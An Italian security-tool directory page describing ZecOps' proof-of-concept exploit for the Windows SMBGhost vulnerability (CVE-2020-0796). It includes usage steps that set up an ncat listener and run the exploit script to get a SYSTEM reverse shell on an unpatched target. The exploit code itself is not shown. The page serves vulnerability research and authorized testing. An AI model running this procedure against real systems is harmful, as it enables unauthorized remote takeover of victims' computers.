Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-0796 — Exploit di esecuzione remota di codice per CVE-2020-0796 (SMBGhost) che prende di mira sistemi Windows 10 1903/1909 senza patch. Consegna una reverse shell tramite una vulnerabilità del protocollo SMB. Destinato a test autorizzati e formazione. | Kitploit
Strumenti/GitHubGitHub/monjheta/cve-2020-0796
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoBinary Exploitation
GitHubmonjheta/cve-2020-0796

CVE-2020-0796

Exploit di esecuzione remota di codice per CVE-2020-0796 (SMBGhost) che prende di mira sistemi Windows 10 1903/1909 senza patch. Consegna una reverse shell tramite una vulnerabilità del protocollo SMB. Destinato a test autorizzati e formazione.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-0796 POC di Esecuzione di Codice Remoto

(c) 2020 ZecOps, Inc. - https://www.zecops.com - Trova gli errori degli attaccanti
POC di Esecuzione di Codice Remoto per CVE-2020-0796 / "SMBGhost"
Risultato previsto: Reverse shell con accesso di sistema.
Inteso solo per scopi educativi e di test in ambienti aziendali.
ZecOps non si assume alcuna responsabilità per il codice, usalo a tuo rischio.
Contatta [email protected] se sei interessato a strumenti DFIR senza agenti per Server, Endpoint e Dispositivi Mobili per rilevare automaticamente SMBGhost e altri tipi di attacchi.

Utilizzo

  • Assicurati che Python e ncat siano installati.

  • Esegui calc_target_offsets.bat sul computer target e regola gli offset all'inizio del file SMBleedingGhost.py in base all'output dello script (vedi anche la nota sotto).

  • Esegui ncat con i seguenti argomenti della riga di comando:

    ncat -lvp <port>

    Dove <port> è il numero di porta su cui ncat ascolterà.

  • Esegui SMBleedingGhost.py con i seguenti argomenti della riga di comando:

    SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>

    Dove <target_ip> è l'indirizzo IP del computer target vulnerabile. <reverse_shell_ip> e <reverse_shell_port> sono l'indirizzo IP e il numero di porta su cui ncat è in ascolto.

  • Se tutto va bene, ncat mostrerà una shell che fornisce accesso di sistema al computer target.

Nota: Potresti chiederti perché sia necessario eseguire lo script calc_target_offsets.bat sul computer target, e se ciò non vanifichi l'intero scopo dell'esecuzione di codice remoto. Questi offset non sono casuali e sono gli stessi su tutte le istanze Windows della stessa versione di Windows. Si potrebbe rendere l'attacco più universale rilevando la versione di Windows target e regolando automaticamente gli offset, o non facendo affidamento su di essi, ma è solo un POC e abbiamo fatto ciò che era più semplice. Riteniamo anche che sia positivo che il POC non sia universale e non sia comodo per usi diversi dal test e dall'istruzione.

demo

Ambiente Target

Le versioni di Windows 10 1903 e 1909 sono interessate. Le versioni non aggiornate di Windows 10 1903 non sono supportate a causa di un bug di dereferenziazione del null in Windows (corretto in KB4512941).

A causa della natura dello sfruttamento, il POC funziona meglio su target in esecuzione su un computer (o una VM) con un singolo processore logico. I target con più di un processore logico in esecuzione su VirtualBox dovrebbero essere supportati, ma il POC è meno affidabile in questo caso. Altri target potrebbero non essere supportati. Per i dettagli, consulta il nostro writeup tecnico di seguito.

Writeup Tecnico

  • SMBleedingGhost Writeup Parte I: Collegare SMBleed (CVE-2020-1206) con SMBGhost
  • SMBleedingGhost Writeup Parte II: Lettura di Memoria Non Autenticata – Preparare il Terreno per un RCE
  • SMBleedingGhost Writeup Parte III: Dalla Lettura Remota (SMBleed) all'RCE

Riferimenti

  • Vulnerability Reproduction: CVE-2020-0796 POC - ZecOps Blog
  • CVE-2020-0796 - Microsoft Security Response Center
  • CVE-2020-1206 - Microsoft Security Response Center
Scarica lo strumento